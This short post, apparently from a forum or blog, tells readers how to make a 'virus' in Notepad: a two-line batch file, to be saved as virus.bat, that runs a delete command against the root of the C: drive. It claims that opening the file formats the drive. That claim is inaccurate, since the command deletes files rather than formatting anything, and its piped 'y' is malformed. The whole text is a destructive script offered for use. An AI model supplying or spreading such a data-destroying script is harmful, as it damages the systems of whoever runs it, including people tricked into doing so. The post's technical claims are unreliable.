It's so easy to create a virus that format C drive,by notepad.
Copy and the paste the below code in notepad and save it with virus.bat(you can change name but .bat is compulsary)
@Echo off
Del C:\ *.* |y
Now open this file,it will format your c drive.